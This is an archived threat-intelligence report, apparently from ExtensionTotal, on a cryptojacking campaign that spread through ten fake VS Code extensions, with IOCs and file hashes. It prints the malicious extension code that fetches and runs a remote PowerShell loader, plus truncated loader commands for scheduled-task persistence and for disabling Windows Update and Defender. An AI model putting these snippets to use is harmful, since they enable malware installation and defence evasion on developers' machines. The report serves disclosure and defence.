{
	"id": "0fcb3942-1561-4538-b5de-270f19f4d93a",
	"created_at": "2026-04-06T00:06:51.299981Z",
	"updated_at": "2026-04-10T13:13:04.022843Z",
	"deleted_at": null,
	"sha1_hash": "4d58143f6caf820377ad38281570c5353a26a142",
	"title": "Mining in Plain Sight: The VS Code Extension Cryptojacking Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2065575,
	"plain_text": "Mining in Plain Sight: The VS Code Extension Cryptojacking\r\nCampaign\r\nBy Yuval Ronen,,\r\nArchived: 2026-04-05 17:01:30 UTC\r\nDevelopers targeted by sophisticated cryptomining campaign hiding in seemingly legitimate VS Code extensions,\r\npotentially reaching over one million installations as detected by ExtensionTotal.\r\nThese fake extensions, published after April 4th by three different authors (mostly “Mark H”), secretly download a\r\nPowerShell script that disables Windows security, establishes persistence through scheduled tasks, and installs an\r\nXMRig cryptominer. The most successful fake extension (“Discord Rich Presence”) gained 189K installs alone.\r\nThe attackers created a sophisticated multi-stage attack, even installing the legitimate extensions they\r\nimpersonated to avoid raising suspicion while mining cryptocurrency in the background.\r\nhttps://blog.extensiontotal.com/mining-in-plain-sight-the-vs-code-extension-cryptojacking-campaign-19ca12904b59\r\nPage 1 of 6\n\nIntroduction\r\nOver the weekend, ten malicious Visual Studio Code extensions were published by three different authors, serving\r\nas the initial access vector in a sophisticated multi-stage cryptomining campaign.\r\nThese extensions masqueraded as popular development tools, with accumulating over one million installs. Once\r\ninstalled, they download and execute a PowerShell loader that disables security services and deploys the XMRig\r\ncryptominer from a remote C2 server.\r\nhttps://app.extensiontotal.com/report/markh.discord-rich-presence-vs\r\nAnatomy of the Malicious Extension Campaign\r\nhttps://blog.extensiontotal.com/mining-in-plain-sight-the-vs-code-extension-cryptojacking-campaign-19ca12904b59\r\nPage 2 of 6\n\nThe malicious campaign published ten different Visual Studio Code extensions.\nPrettier — Code for VSCode (by prettier ) - 955K Installs\nDiscord Rich Presence for VS Code (by Mark H ) - 189K Installs\nRojo — Roblox Studio Sync (by evaera ) - 117K Installs\nSolidity Compiler (by VSCode Developer ) - 1.3K Installs\nClaude AI (by Mark H )\nGolang Compiler (by Mark H )\nChatGPT Agent for VSCode (by Mark H )\nHTML Obfuscator (by Mark H )\nPython Obfuscator for VSCode (by Mark H )\nRust Compiler for VSCode (by Mark H )\nThe three most popular extensions in the campaign, showing 955K, 189K and 117K installs, respectively, reached\nthese numbers in an unusually short period of time. This strongly suggests that the install counts were artificially\ninflated, likely in an attempt to establish credibility and reduce user suspicion by making the extensions appear\nwidely trusted and actively used.\nThe extensions operate the same way — first, download and execute a Powershell script from the same C2 server\nat https://asdf11[.]xyz/ in a hidden window.\nThey then attempt to install the legitimate extension they impersonate, so that users still receive the expected\nfunctionality and are less likely to suspect malicious behavior.\nfunction activate(context) {\n // Register the command to execute the PowerShell Loader and install the extension\n let disposable = vscode.commands.registerCommand('hubtestmanagerex.runCmd', async function () {\n if (process.platform === 'win32') {\n const cmdCommand = 'powershell -Command \"irm | iex\"';\npotry {\n // Execute the command to download and execution the PowerShell Loader\n await executeCmdCommand(cmdCommand);\n // After the PowerShell Loader has been executed, install the Solidity extension\n const extensionId = 'icrawl.discord-vscode'; // The identifier for the Solidity extension\n await installExtension(extensionId);\n\n} catch (error) {\n vscode.window.showErrorMessage(`Failed to execute command: ${error.message}`);\n }\n }\n });\nThe C2 domain asdf11[.]xyz was created recently, on the same day the first extensions were published - April 4\n2025.\nhttps://blog.extensiontotal.com/mining-in-plain-sight-the-vs-code-extension-cryptojacking-campaign-19ca12904b59\nPage 3 of 6\n\nAlthough the extensions were published under different author names, they share identical code and communicate\r\nwith the same C2 server to download and execute the same payload.\r\nMalicious behavior from extension’s report on ExtensionTotal\r\nPowerShell Loader\r\nThe PowerShell script is responsible for Persistence, Defense Evasion, Privilege Escalation and Execution.\r\nPersistence mechanism\r\nSets up a scheduled task named “OnedriveStartup” to run at logon (masquerading as legitimate OneDrive\r\nsoftware)\r\nStart-Process \"cmd.exe\" -ArgumentList \"/c schtasks /create /tn `\"OnedriveStartup`\" /tr `\"$qZVhfWBWTd5ptqbWRS8gz\r\nCreates and runs the script from a Registry Entry\r\nStart-Process \"cmd.exe\" -ArgumentList \"/c reg add \"\"HKCU\\\\Software\\\\Microsoft\"\" /v \"\"Version\"\" /t REG_SZ /d $uD\r\nDefense Evasion\r\nDisables Windows Security Services\r\n# Stops the Windows Update Service and disables it from starting\r\nStop-Service -Name wuauserv -Force\r\nSet-Service -Name wuauserv -StartupType Disabled\r\nhttps://blog.extensiontotal.com/mining-in-plain-sight-the-vs-code-extension-cryptojacking-campaign-19ca12904b59\r\nPage 4 of 6\n\n# Modifies registry to disable the Windows Update Medic Service\r\nStart-Process \"cmd.exe\" -ArgumentList '/c reg add \"HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WaaSMedicSvc\" /v S\r\n# Stops and disables the Update Orchestrator Service\r\nStop-Service -Name UsoSvc -Force\r\nSet-Service -Name UsoSvc -StartupType Disabled\r\nAdds the directory it created to Windows Defenders Exclusion Path\r\nStart-Process \"cmd.exe\" -ArgumentList \"/c powershell -Command \"\"Add-MpPreference -ExclusionPath '%localappdata%\r\nStart-Process \"cmd.exe\" -ArgumentList \"/c reg add `\"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Exclu\r\nPrivilege Escalation\r\nThe PowerShell script tries to run the malicious payload with Administrator permissions.\r\nIf it doesn’t have the permissions, the script tries to create another System32 directory and copy the\r\nComputerDefaults.exe file to it. Then, the script creates its own malicious DLL named MLANG.dll and tries to\r\nexecute it using this ComputerDefaults executable.\r\nExecution\r\nThe PowerShell script contains the DLLs and the Trojan executable as basic base64 encoded strings. It decodes\r\nthe Trojan and writes it to the directory it created and excluded from the Windows Defender as Launcher.exe .\r\nThe Launcher.exe communicates with another C2 server - myaunet[.]su , downloading and executing the\r\nXMRig tool - used for mining Monero.\r\nConclusion\r\nThis campaign is yet another example of the growing sophistication and frequency of supply chain attacks within\r\ndeveloper ecosystems. As marketplaces like the Visual Studio Code extension store continue to grow, so does their\r\nattractiveness as a vector for exploitation.\r\nAt ExtensionTotal, we help organizations navigate this evolving threat landscape by detecting malicious or risky\r\nextensions before they cause harm, allowing teams to continue leveraging the power and productivity of modern\r\ndevelopment tools without compromising on security.\r\nIOCs\r\nVS Code Package Names\r\nprettierteam.prettier\r\nmarkh.chatgpt-autocoder-vscode\r\nhttps://blog.extensiontotal.com/mining-in-plain-sight-the-vs-code-extension-cryptojacking-campaign-19ca12904b59\r\nPage 5 of 6\n\nmarkh.claude-autocoder-vscode\r\nmarkh.discord-rich-presence-vs\r\nmarkh.golang-compiler-vscode\r\nmarkh.python-obfuscator-vscode\r\nmarkh.rust-compiler-vs\r\nevaera-rbx.vscode-rojo-rbx\r\nvscodedeveloper.sobidity-compiler\r\nFile Hashes\r\n2d17f0cb6c8d9488f2d101b90052692049b0c4bd9bf4949758aae7b1fd936191 — Launcher.exe / myau.exe\r\nd2fcf28897ddc2137141d838b734664ff7592e03fcd467a433a51cb4976b4fb1 — xmrig.exe\r\nbb757c6338491170072e8b743ea2758eebaeb1472ba6b421c950c79a3daed853 — PowerShell\r\n26111b28f6c507ea68e7c8a0f3ad64fb0d7b694d7f703bc626d871c4e1502dc2 — PowerShell\r\n0c05365ea9c1162b10d93ffdc93eb4207b61062d35dbf6d424ad15e3342ecb70 — PowerShell\r\nb98dfc7ed18d6d30490fc2b997fbeae36541335bd05a94624da8b808e818d094 — PowerShell\r\n71b48bc26f4a4f9759eaf35f44e7cebf4f18e1a74ab2c902f91404ca8ceb3a4e — PowerShell\r\n13db408a3232ea31aab8edc648b6c315782db9516e1c08c6bd667e17f5dd147c — DLL\r\n515e6d58b720d5e125602621b28fa37a669efed508e983b8c3136bea80d46640 — DLL\r\nC2 Servers\r\nasdf11[.]xyz\r\nmyaunet[.]su\r\nSource: https://blog.extensiontotal.com/mining-in-plain-sight-the-vs-code-extension-cryptojacking-campaign-19ca12904b59\r\nhttps://blog.extensiontotal.com/mining-in-plain-sight-the-vs-code-extension-cryptojacking-campaign-19ca12904b59\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.extensiontotal.com/mining-in-plain-sight-the-vs-code-extension-cryptojacking-campaign-19ca12904b59"
	],
	"report_names": [
		"mining-in-plain-sight-the-vs-code-extension-cryptojacking-campaign-19ca12904b59"
	],
	"threat_actors": [],
	"ts_created_at": 1775434011,
	"ts_updated_at": 1775826784,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4d58143f6caf820377ad38281570c5353a26a142.pdf",
		"text": "https://archive.orkl.eu/4d58143f6caf820377ad38281570c5353a26a142.txt",
		"img": "https://archive.orkl.eu/4d58143f6caf820377ad38281570c5353a26a142.jpg"
	}
}